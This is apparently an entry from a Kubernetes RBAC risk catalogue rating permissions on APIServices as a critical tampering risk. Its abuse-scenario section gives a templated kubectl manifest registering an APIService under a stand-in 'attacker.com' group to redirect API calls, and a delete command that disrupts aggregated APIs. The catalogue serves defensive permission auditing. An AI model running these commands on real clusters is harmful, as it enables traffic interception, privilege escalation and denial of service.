Manage APIServices
Tampering
Critical
Overview
| Field | Value |
|---|---|
| ID | 1046 |
| Name | Manage APIServices |
| Risk Category | Tampering |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | apiregistration.k8s.io |
| Resources | apiservices |
| Risky Verb Combinations | [create] · [update] · [patch] · [delete] |
| Tags | APIServiceManipulation DenialOfService InformationDisclosure PrivilegeEscalation Tampering |
Description
Grants control over APIServices, which register aggregated API servers. This is highly critical as an attacker can redirect API requests to a malicious server, intercept traffic, escalate privileges, cause denial of service, or exfiltrate information.
Abuse Scenarios
- Create a new APIService to redirect API calls to a malicious server.
kubectl create -f - <<EOF
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
name: v1alpha1.attacker.com
spec:
service:
name: <malicious-service-name>
namespace: <malicious-service-namespace>
group: attacker.com
version: v1alpha1
caBundle: <base64-encoded-ca-cert> # CA for the malicious service
groupPriorityMinimum: 2000 # Higher than core APIs
versionPriority: 200
EOF
# Example: kubectl create -f - <<EOF ... EOF
- Delete an existing APIService, disrupting aggregated API functionality.
kubectl delete apiservice <apiservice-name>
# Example: kubectl delete apiservice v1beta1.metrics.k8s.io